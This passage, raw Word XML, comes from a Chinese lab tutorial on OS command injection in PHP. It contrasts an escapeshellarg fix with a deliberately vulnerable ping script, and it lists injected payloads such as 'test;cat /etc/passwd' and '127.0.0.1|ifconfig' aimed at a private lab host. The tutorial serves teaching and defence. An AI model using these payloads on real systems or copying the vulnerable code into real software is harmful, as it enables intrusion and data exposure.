      <w:tr w14:paraId="4FFEC91E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280" w:type="dxa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C56BD34">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73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cd /test123 || echo "目录不存在"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EC3721E">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="heading_14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>5. 管道符 |</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="2D0D0CB8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作用：前命令输出作为后命令输入</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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8280"/>
      </w:tblGrid>
      <w:tr w14:paraId="303B6FC8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280" w:type="dxa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5E8BB77">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73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ls -l | grep "Mar"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31043F0D">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="heading_15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>6. 重定向符 &gt; &gt;&gt; &lt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="2A09E90A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 覆盖写入文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398311DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 追加写入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBF9BA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 从文件读取内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222A1DE2">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
          <w:between w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00BB3C3F">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="heading_16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>5.1.4 防御演示：repairExec.php 源码与分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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8280"/>
      </w:tblGrid>
      <w:tr w14:paraId="1625BF1F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280" w:type="dxa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CE7F110">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73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&lt;?php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// 获取用户输入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$userInput = $_GET['user_input'];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// 安全过滤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$safeInput = escapeshellarg($userInput);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// 安全执行命令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$command = "grep $safeInput /var/log/httpd/access_log";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$output = shell_exec($command);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echo "执行结果:".$output;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?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="194C1D18">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="heading_17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>escapeshellarg () 作用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="1174392B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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给用户输入自动包裹单引号，变为纯字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9A5B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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 xml:space="preserve">转义 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>; | &amp;&amp; || &gt; &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等危险符号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222E61AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24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使用户输入无法断开命令、无法注入新命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2739789A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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从根源阻止命令执行漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA96BF9">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="heading_18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>防御效果验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="4E3E6442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访问地址：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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8280"/>
      </w:tblGrid>
      <w:tr w14:paraId="01F24C21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280" w:type="dxa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AC15550">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Plain Text</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73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http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>192.168.44.129</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/test_exec/repairExec.php?user_input=test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CC30DF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页面正常返回日志中含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的记录，无命令注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCAF8FF">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="heading_19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>注入测试对比</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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650"/>
        <w:gridCol w:w="1650"/>
        <w:gridCol w:w="1650"/>
        <w:gridCol w:w="1650"/>
        <w:gridCol w:w="1650"/>
      </w:tblGrid>
      <w:tr w14:paraId="1110112F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65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E9E8470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Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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7A152B6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无过滤结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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E7E93B9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使用 escapeshellarg 结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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381F750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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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1450DDE"/>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="210EA941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65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9249B2B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test;cat /etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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11855DC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执行 cat 读取用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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07F575C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仅 grep 搜索</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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94B6241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防御成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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288325A"/>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="40D03E4A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65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1E76CA3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test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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54D2025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id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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9E2676B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截断执行 id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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310DF86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仅 grep 搜索</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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05BA65D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防御成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5D9BBA1F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65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749FC9B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test&amp;&amp;ls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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0122734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执行 ls 列出目录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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F7FCC5B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仅 grep 搜索</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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69E0544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防御成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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68ECF03"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B20F74C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
          <w:between w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49520FE4">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="heading_20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>第二部分 任务 5.2 命令执行漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="7FCCB87B">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="heading_21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>5.2.1 漏洞原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="36015918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漏洞文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/exec/01.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>直接将用户输入拼接到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>命令，无任何过滤，可被注入任意系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186C79B5">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="heading_22"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞源码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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8280"/>
      </w:tblGrid>
      <w:tr w14:paraId="6DC97C1E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280" w:type="dxa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FB68D57">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73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&lt;?php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$ip = $_GET['ip'];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system("ping -c 3 ".$ip);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?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CCB78A7">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
          <w:between w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="088EDAC6">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="heading_23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>5.2.2 漏洞复现步骤（主机直接访问）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="4A91A955">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="heading_24"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>步骤 1：正常访问</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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8280"/>
      </w:tblGrid>
      <w:tr w14:paraId="4999856D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280" w:type="dxa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282E492">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Plain Text</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73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http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>192.168.44.129</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/exec/01.php?ip=127.0.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4593F929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效果：正常执行 ping。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DA85AA">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="heading_25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>步骤 2：管道符 | 执行 ifconfig</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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8280"/>
      </w:tblGrid>
      <w:tr w14:paraId="17DA2328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280" w:type="dxa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2EA75C1">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Plain Text</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73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http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>192.168.44.129</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/exec/01.php?ip=127.0.0.1|ifconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23AA7AE9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效果：显示网卡信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0E9390">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="heading_26"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>步骤 3：管道符 | 执行 netstat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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8280"/>
      </w:tblGrid>
      <w:tr w14:paraId="36CC66AF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280" w:type="dxa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D87E59E">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Plain Text</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73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http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>192.168.44.129</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/exec/01.php?ip=127.0.0.1|netstat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1628BD52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效果：显示网络连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAA7DC6">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="heading_27"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>步骤 4：分号；执行 whoami</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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8280"/>
      </w:tblGrid>
      <w:tr w14:paraId="1C68B0F0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280" w:type="dxa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5B24C27">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Plain Text</w:t>
            </w:r>
            <w:r>
              <w:rPr>
